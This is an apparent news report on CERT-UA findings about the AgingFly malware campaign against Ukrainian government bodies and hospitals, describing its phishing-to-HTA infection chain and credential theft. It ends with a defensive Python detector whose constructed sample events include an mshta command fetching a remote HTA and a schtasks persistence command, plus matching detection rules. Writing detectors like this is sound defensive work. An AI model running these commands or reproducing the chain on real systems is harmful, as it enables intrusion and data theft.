New 'AgingFly' Malware Targets Ukrainian Government and Hospitals, Stealing Authentication Data
A new malware family dubbed 'AgingFly' has been discovered targeting Ukrainian government entities and hospitals. The malware steals authentication data from Chromium-based browsers and **WhatsApp**, highlighting the ongoing cyber warfare in the region.

Ukrainian Computer Emergency Response Team (**CERT-UA**) has identified a new malware family, 'AgingFly,' actively used in attacks against local governments and hospitals in Ukraine. The malware's primary objective is to steal authentication data from Chromium-based browsers and WhatsApp messenger.
These attacks, spotted last month, are believed, based on forensic evidence, to target representatives of the Defense Forces.
CERT-UA attributes these attacks to a cyber threat cluster tracked as UAC-0247.
### Attack Chain
The attack chain begins with a phishing email disguised as a humanitarian aid offer. Victims are lured into clicking an embedded link.
This link redirects to either a legitimate site compromised via a cross-site scripting (XSS) vulnerability or a fake site generated using an AI tool.
The target then receives an archive containing a shortcut file (LNK) that launches a built-in HTA handler. This handler connects to a remote resource to retrieve and execute an HTA file.
The HTA file displays a decoy form to distract the user while a scheduled task is created. This task downloads and runs an EXE payload that injects shellcode into a legitimate process.
Next, the attackers deploy a two-stage loader, with the second stage utilizing a custom executable format. The final payload is compressed and encrypted.
"A typical TCP reverse shell or an analogue classified as RAVENSHELL can be used as stagers, which provides for establishing a TCP connection with the management server," CERT-UA stated in their report.
A TCP connection, encrypted using the XOR cipher, is established with the Command and Control (C2) server, allowing for command execution via the Windows Command Prompt.
Subsequently, the AgingFly malware is delivered and deployed. A **PowerShell** script (SILENTLOOP) is used to execute commands, update configurations, and retrieve the C2 server address from a **Telegram** channel or fallback mechanisms.

After investigating multiple incidents, researchers found that the attackers are stealing browser data using **ChromElevator**, an open-source security tool. ChromElevator decrypts and extracts sensitive information, such as cookies and saved passwords, from Chromium-based browsers (e.g., **Google Chrome**, **Microsoft Edge**, **Brave**) without requiring administrator privileges.
The threat actor also attempts to extract sensitive data from the WhatsApp application for Windows by decrypting databases using the ZAPiDESK open-source forensic tool.
Researchers have observed reconnaissance activities and lateral movement within the network, utilizing publicly available utilities like the RustScan port scanner and the Ligolo-ng and Chisel tunneling tools.
### AgingFly's Unique Characteristics
AgingFly, written in **C#**, grants operators remote control, command execution, file exfiltration, screenshot capture, keylogging, and arbitrary code execution capabilities.
It communicates with its C2 server via WebSockets and encrypts the traffic using AES-CBC with a static key.
Notably, AgingFly does not include pre-built command handlers. Instead, it compiles them on the host from source code received from the C2 server.
"A distinguishing feature of AGINGFLY compared to similar malware is the absence of built-in command handlers in its code. Instead, they are retrieved from the C2 server as source code and dynamically compiled at runtime," CERT-UA explains.
This approach offers a smaller initial payload, on-demand capability changes, and potential evasion of static detection. However, it increases complexity, relies on C2 connectivity, and expands the runtime footprint, potentially increasing detection risk.
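As an added defensive example (not code from the article or from CERT-UA), the following Python detector checks constructed Sysmon-style process-creation records against three stages described above: the HTA handler fetching a remote HTA, the scheduled task created from a script host, and the on-host compilation of command handlers that expands the runtime footprint. The sample events, the script-host set and the build-tool allowlist are assumptions for this example and would be tuned to a real environment.

```python
import re

# Script hosts that the attack chain uses to create persistence (assumption:
# extend with whatever script interpreters the environment allows).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}

# Parents from which the C# compiler is expected to be launched. PowerShell's
# Add-Type also spawns csc.exe; leaving it out makes the rule noisier but catches
# compilation driven by scripts such as the loader described in the article.
KNOWN_BUILD_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}

# Constructed Sysmon Event ID 1-style records; not telemetry from the campaign.
EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://example.invalid/aid-form.hta"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"schtasks /create /sc minute /mo 5 /tn Upd /tr C:\Users\Public\upd.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": "csc.exe /noconfig @obj\\Debug\\Project.csproj.rsp"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Users\Public\svc.exe",
     "CommandLine": r"csc.exe /noconfig /fullpaths @C:\Users\Public\tmp\handler.cmdline"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, event_index) pairs for events matching a chain stage."""
    findings = []
    for i, ev in enumerate(events):
        image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        cmd = ev["CommandLine"]
        # Stage: LNK-launched HTA handler fetching an HTA from a remote resource.
        if image == "mshta.exe" and re.search(r"https?://", cmd, re.IGNORECASE):
            findings.append(("remote_hta", i))
        # Stage: scheduled task created by a script host rather than an admin tool.
        if image == "schtasks.exe" and "/create" in cmd.lower() and parent in SCRIPT_HOSTS:
            findings.append(("schtask_from_script_host", i))
        # Stage: C# compiler launched by something other than build tooling, the
        # host-side footprint of handlers compiled from C2-supplied source.
        if image in {"csc.exe", "vbc.exe"} and parent not in KNOWN_BUILD_PARENTS:
            findings.append(("runtime_compile", i))
    return findings
```

The third rule is a triage signal rather than proof: legitimate .NET components also invoke csc.exe, so the parent allowlist is what keeps it useful.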
CERT-UA advises users to block the execution of LNK, HTA, and JS files to disrupt the attack chain used in this campaign.